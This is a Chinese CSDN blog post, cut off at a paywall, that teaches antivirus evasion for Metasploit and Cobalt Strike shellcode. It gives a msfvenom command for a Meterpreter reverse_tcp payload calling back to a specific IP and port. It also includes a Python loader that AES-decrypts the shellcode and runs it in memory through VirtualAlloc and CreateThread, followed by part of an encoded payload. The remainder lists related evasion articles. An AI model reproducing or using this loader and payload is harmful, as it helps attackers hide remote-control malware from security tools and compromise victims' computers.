免杀对抗-MSF\CS-AES+Base64

最新推荐文章于 2024-09-27 17:31:02 发布
最新推荐文章于 2024-09-27 17:31:02 发布
阅读量790 收藏
点赞数
分类专栏: 免杀对抗 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62172162/article/details/130367122
版权
该文描述了如何使用Python脚本配合AES加密算法对Metasploit(MSF)和CobaltStrike(CS)生成的shellcode进行加密和解密。MSF生成的shellcode首先通过base64编码,然后用AES加密。在解密过程中,使用相同的密钥和初始化向量进行解密。文章还展示了如何运行解密后的shellcode。最后提到了实验中所有payload均使用64位版本。
摘要由CSDN通过智能技术生成

目录

MSF

CS

MSF

msf生成的shellcode采用base64编码

msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=47.94.236.117 lport=6688-f c

脚本里面内置的AES和加密函数

encrypt加密

decrypt解密

两个脚本:一个脚本加密,加密的东西另外一个脚本解密调用执行

1.py

from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
import ctypes,base64


# 如果text不足16位的倍数就用空格补足为16位
def add_to_16(text):
    if len(text.encode('utf-8')) % 16:
        add = 16 - (len(text.encode('utf-8')) % 16)
    else:
        add = 0
    text = text + ('\0' * add)
    return text.encode('utf-8')


# 加密函数
def encrypt(text):
    key = '9999999999999999'.encode('utf-8')
    mode = AES.MODE_CBC
    iv = b'qqqqqqqqqqqqqqqq'
    text = add_to_16(text)
    cryptos = AES.new(key, mode, iv)
    cipher_text = cryptos.encrypt(text)
    #print(base64.b64decode(cipher_text))
    # 因为AES加密后的字符串不一定是ascii字符集的,输出保存可能存在问题,所以这里转为16进制字符串
    return b2a_hex(cipher_text)


# 解密后,去掉补足的空格用strip() 去掉,注意此时不需要解密函数,可以去掉
def decrypt(text):
    key = '9999999999999999'.encode('utf-8')
    iv = b'qqqqqqqqqqqqqqqq'
    mode = AES.MODE_CBC
    cryptos = AES.new(key, mode, iv)
    plain_text = cryptos.decrypt(a2b_hex(text))
    shellcode=bytes.decode(plain_text).rstrip('\0')
    return shellcode

def zhixing(shellcode):
    rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
    ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
    handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

if __name__ == '__main__':
    #对payload进行base64加密
    #msf
    s = '''
    \x2f\x45\x69\x44\x35\x50\x44\x6f\x7a\x41\x41\x41\x41\x45
\x46\x52\x51\x56\x42\x53\x53\x44\x48\x53\x5a\x55\x69\x4c
\x55\x6d\x42\x49\x69\x31\x49\x59\x55\x56\x5a\x49\x69\x31
\x49\x67\x54\x54\x48\x4a\x53\x41\x2b\x33\x53\x6b\x70\x49
\x69\x33\x4a\x51\x53\x44\x48\x41\x72\x44\x78\x68\x66\x41
\x49\x73\x49\x45\x48\x42\x79\x51\x31\x42\x41\x63\x48\x69
\x37\x56\x4a\x42\x55\x55\x69\x4c\x55\x69\x43\x4c\x51\x6a
\x78\x49\x41\x64\x42\x6d\x67\x58\x67\x59\x43\x77\x49\x50
\x68\x58\x49\x41\x41\x41\x43\x4c\x67\x49\x67\x41\x41\x41
\x42\x49\x68\x63\x42\x30\x5a\x30\x67\x42\x30\x49\x74\x49
\x47\x45\x53\x4c\x51\x43\x42\x4a\x41\x64\x42\x51\x34\x31
\x5a\x49\x2f\x38\x6c\x4e\x4d\x63\x6c\x42\x69\x7a\x53\x49
\x53\x41\x48\x57\x53\x44\x48\x41\x72\x45\x48\x42\x79\x51
\x31\x42\x41\x63\x45\x34\x34\x48\x58\x78\x54\x41\x4e\x4d
\x4a\x41\x68\x46\x4f\x64\x46\x31\x32\x46\x68\x45\x69\x30
\x41\x6b\x53\x51\x48\x51\x5a\x6b\x47\x4c\x44\x45\x68\x45
\x69\x30\x41\x63\x53\x51\x48\x51\x51\x59\x73\x45\x69\x45
\x67\x42\x30\x45\x46\x59\x51\x56\x68\x65\x57\x56\x70\x42
\x57\x45\x46\x5a\x51\x56\x70\x49\x67\x2b\x77\x67\x51\x56
\x4c\x2f\x34\x46\x68\x42\x57\x56\x70\x49\x69\x78\x4c\x70
\x53\x2f\x2f\x2f\x2f\x31\x31\x4a\x76\x6e\x64\x7a\x4d\x6c
\x38\x7a\x4d\x67\x41\x41\x51\x56\x5a\x4a\x69\x65\x5a\x49
\x67\x65\x79\x67\x41\x51\x41\x41\x53\x59\x6e\x6c\x53\x62
\x77\x43\x41\x42\x6f\x67\x77\x4b\x67\x54\x6c\x6b\x46\x55
\x53\x59\x6e\x6b\x54\x49\x6e\x78\x51\x62\x70\x4d\x64\x79
最低0.47元/天 解锁文章
加油上分版
关注
专栏目录
免杀对抗-MSF\CS-shellcode反序列化
m0_62172162的博客
04-25 620
免杀对抗-MSF\CS-shellcode反序列化
Qt第四十八章:成功、警告、信息、错误 弹窗组件
Good Luck
12-27 2446
【代码】Qt第四十八章:成功、警告、信息、错误 弹窗组件。
利用MSF生成php,windows,Linux三类木马
2301_76786857的博客
03-19 2146
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
关于凯撒密码加密特征值,base64加密shellcode并分离绕过杀软
weixin_46661122的博客
07-05 1588
什么是shellcode? 在黑客攻击中,shellcode是一小段代码,用于利用软件漏洞作为有效载荷。它之所以被称为“shellcode”,是因为它通常启动一个命令shell,攻击者可以从这个命令shell控制受损的计算机,但是执行类似任务的任何代码都可以被称为shellcode。因为有效载荷(payload)的功能不仅限于生成shell,所以有些人认为shellcode的名称是不够严谨的。然而,试图取代这一术语的努力并没有得到广泛的接受。shellcode通常是用机器码编写的。 C/C++加载方式 #i
msf的实战使用——msfvenom
tomyyyyy
05-11 2936
msf的实战使用——msfvenom 文章目录msf的实战使用——msfvenommsfvenom命令的参数常用命令木马免杀姿势1:Py2exe生成exe姿势2:PyInstaller生成exe姿势3:编译c源码 msfvenom命令的参数 Options: -l, --list <type> # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt,
107-免杀对抗-C&C++&溯源ShellCode上线&混淆变异算法&回调编译执行
qq_46081990的博客
07-13 1514
今天主要讲的是shellcode混淆免杀: 1 、首先明确为什么不对exe类型做手脚,而是对shellcode做手脚?因为对exe类型做手脚(如加壳)可以免杀,但是可能导致出错,无法上线。而对shellcode进行操作,再编译打包成exe,一般不会有这种问题。2 、杀软如何检测到病毒的?一般是通过逆向分析后门文件,匹配病毒特征检测到的。3 、如何用shellcode实现免杀?今天讲的是使用加密算法(如XOR、AES、Hex、RC4)对shellcode进行加密混淆,实现免杀
小迪安全-免杀对抗+红队APT
m0_73767545的博客
06-03 402
就是利用字眼,对官网域名进行修改,在.com后加上其他字符,例如.com.cn。判断邮箱是否有spf验证(对IP进行校验,满足即可发送),如果无即可伪造。nslookup -type=txt 邮箱域名后缀。
免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall
xiaoheizi的博客
09-13 1274
1.生成或者python2.打开pycharm工具,创建一个py文件,将原生态执行代码复制进去shellcode3.将生成的shellcode放到执行代码中,运行代码,cs成功上线1.执行命令,生成shellcode命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.129 lport=4444 -f c2.msf设置监听3.将shellcode放到执行脚本中运行。
免杀对抗-C#+go语言-混淆+防反编译+分离
xiaoheizi的博客
09-19 1661
介绍:上传脚本到目标系统时,很容易就会被杀软将脚本反编译检测,所以将脚本使用ConfuserEx项目进行保护,防止杀软反编译检测。命令:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=监听。命令:go build -ldflags "-s -w -H=windowsgui" 5.go。1.打开工具,将生成的exe程序拖入工具,然后如下图操作。执行文件,上传到目标系统,被火绒杀死。正常上传到目标系统,成功绕过检测。上传到目标系统,执行程序,
免杀对抗-ShellCode上线+回调编译执行+混淆变异算法
xiaoheizi的博客
09-10 3380
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。我们经常在CS里面生成指定编程语言的payload,而这个payload里面就是一段十六进制的机器码。2.将shellcode放到执行脚本中(使用的调用执行方式是:申请动态内存加载),利用C/C++语言编译成exe执行文件。因为shellcode的免杀手段多,损坏的可能性小,能自定义更多选择。3.将新的shellcode放到自写的执行脚本xor.cpp中,使用。
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1427
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
msfvenom——木马免杀
tomyyyyy
08-24 2960
msfvenom——木马免杀篇 目录msfvenom——木马免杀篇c语言执行生成shellcode.cc语言执行检查python语言执行方法一:python加载C代码方法2:py2exe打包编译exe方法3:base64编码c语言执行 生成shellcode.c msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_t...
简单题101. 对称二叉树 (python)20240922
Sep21m_wyy的博客
09-22 384
【代码】简单题101. 对称二叉树 (python)20240922。
第二百五十四节 JPA教程 - JPA 多对多映射示例
2301_78772942的博客
09-27 442
第二百五十四节 JPA教程 - JPA 多对多映射示例
Python 类class的用法详解
十七次方
09-22 805
Python 中,使用 class 关键字来定义一个类。类定义通常包括类变量、实例变量和方法。
Python 高阶内容:套娃式装饰器巧妙为函数增加功能
敲代码别忘了喝上一杯凉白开。
09-23 559
装饰器是 Python 中一种非常强大且灵活的工具,能够在不修改函数本身的情况下,为函数增加额外的功能。本文介绍了装饰器的基本概念及应用,通过实例演示如何在函数执行前后添加额外操作,如鉴权、数据验证等,类似“套娃”般层层嵌套。文章还通过代码示例展示了如何定义和使用装饰器,以及如何将装饰器与实际业务逻辑结合,实现灵活的功能扩展。这种设计模式不仅可以提升代码的可读性和可维护性,还可以有效减少代码的冗余。掌握装饰器的用法,将为你的 Python 编程技巧增添更多亮点。
Python/大数据/机器识别毕业设计选题题目推荐
初尘屿风的博客
09-27 464
基于Python和Diango在线购物商城系统+报告文档+指导搭建视频基于深度学习的人脸识别与管理系统,Python实现基于Python/机器学习链家网新房数据可视化及预测系统Python豆瓣电影情感分析推荐系统+爬虫+可视化,过滤算法基于python的django框架生鲜商城管理系统设计与实现基于Python的Flask微博话题舆情分析可视化系统设计基于Python豆瓣电影数据可视化分析系统+毕业论文+指导搭建视频基于Python天气预报数据可视化分析系统+毕业论文基于Python的深度学习音乐推荐系统+
numpy is not available
最新发布
xfsong2012的博客
09-27 86
在测试第一个程序的时候,出现Numpy is not available的错误,根据。安装的时候,安装的是最新版的numpy,检查numpy的版本为2.1.1版。我的pytorch版本为1.12.1,选择不高于1.21的版本即可。的办法知道是因为numpy与pytorch版本不一致造成的。2、安装需要的numpy版本,比如1.21版。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值